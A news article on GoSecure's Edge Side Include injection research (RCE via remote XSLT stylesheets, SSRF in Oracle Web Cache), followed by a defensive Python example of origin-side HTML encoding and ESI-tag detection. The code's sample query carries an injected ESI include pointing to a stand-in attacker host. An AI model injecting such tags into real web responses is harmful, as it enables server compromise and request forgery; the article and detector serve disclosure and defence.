Researchers discover new ways to leverage markup language
The exploit involves injecting malicious XML tags within HTML caching configurations that use Edge Side Includes.
Edge Side Includes, or ESI, is an XML-based markup language used to temporarily store dynamic web files that are not saved through regular web caching protocols.
It was invented to improve web page accessibility, but is only processed by certain proxy servers, such as Akamai or Varnish.
“An attacker can abuse this mechanism by injecting a malicious tag inside an intercepted web page,” said GoSecure researcher Philippe Arteau in a blog post published yesterday, highlighting the implications of the attack vector, first discovered in April 2018.
Louis Dion-Marcil, another GoSecure researcher who spoke about abusing caching servers at last year’s DEF CON, added that the ESI implementation protocol hadn’t been updated since 2001.
“HTTP surrogates are not able to distinguish between legitimate ESI tags provided by the upstream server and malicious ones injected in the HTTP response,” he said.
“In other words, if an attacker can successfully reflect ESI tags in the HTTP response, then the surrogate will blindly parse and evaluate them, believing they are legitimate tags that are served from the upstream server.”
Edge Side Exploits
The latest findings from GoSecure show how a malicious ESI tag can be used – at least in one case – to trigger RCE.
“The stylesheet attribute will point to a malicious XSLT resource hosted on a remote server controlled by the attacker,” Arteau said.
“The XSLT processing is triggered automatically by ESI-Gate when the included tag has a remote stylesheet.
“By default, the XML parser in Java allows the import of Java functions. This can easily lead to arbitrary code execution.”
In another instance, a header injection can occur in the Oracle Web Cache, leading to Server-Side Request Forgery (SSRF).
Users are advised to update to the latest version of Oracle Web Cache and to use only HTML encoding in order to prevent attackers from injecting malicious ESI tags.
“The ESI specification does not provide a mechanism to authenticate that a tag has been legitimately issued by the backend,” Arteau said.
“For this reason, any caching proxy with ESI enabled will continue to have potential issues like the one we describe.”
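Because the surrogate cannot tell backend tags from reflected ones, the HTML-encoding mitigation has to happen at the origin. The following is an added example, not code from GoSecure or any vendor: it shows a reflected parameter with and without encoding, plus two checks an origin can run on its own responses. The handler, fragment path, allow-list and sample request are all constructed for illustration.

```python
import html
import re
from urllib.parse import parse_qsl

# Opening of any ESI element, e.g. <esi:include ...> (case-insensitive).
ESI_TAG = re.compile(r"<\s*/?\s*esi:[a-z]+", re.IGNORECASE)
# src attribute of an <esi:include> element.
ESI_SRC = re.compile(r"<esi:include\b[^>]*?\bsrc\s*=\s*[\"']([^\"']*)[\"']", re.IGNORECASE)

# Constructed sample request: one parameter carries an ESI include tag.
SAMPLE_QUERY = "q=%3Cesi%3Ainclude+src%3D%22http%3A%2F%2Fattacker.example%2Fx%22%2F%3E&page=2"
# ESI sources this (hypothetical) application's templates emit.
ALLOWED_SRCS = {"/fragments/header"}


def render_search_page(term: str, encode: bool = True) -> str:
    """Hypothetical origin handler that reflects a query parameter into HTML."""
    shown = html.escape(term, quote=True) if encode else term
    return (
        "<html><body>"
        '<esi:include src="/fragments/header"/>'  # the backend's own tag
        f"<p>Results for: {shown}</p>"
        "</body></html>"
    )


def reflected_esi(query_string: str, body: str) -> list[str]:
    """Names of parameters whose ESI markup appears unencoded in the body."""
    return [
        name
        for name, value in parse_qsl(query_string, keep_blank_values=True)
        if ESI_TAG.search(value) and value in body
    ]


def foreign_esi_includes(body: str, allowed: set[str]) -> list[str]:
    """ESI include sources in the body that no template is known to emit."""
    return [src for src in ESI_SRC.findall(body) if src not in allowed]


if __name__ == "__main__":
    term = dict(parse_qsl(SAMPLE_QUERY))["q"]
    for encode in (False, True):
        body = render_search_page(term, encode=encode)
        print(encode, reflected_esi(SAMPLE_QUERY, body),
              foreign_esi_includes(body, ALLOWED_SRCS))
```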
Arteau and Dion-Marcil’s work into Edge Side Include Injection was included in PortSwigger’s top 10 web hacking techniques of 2018.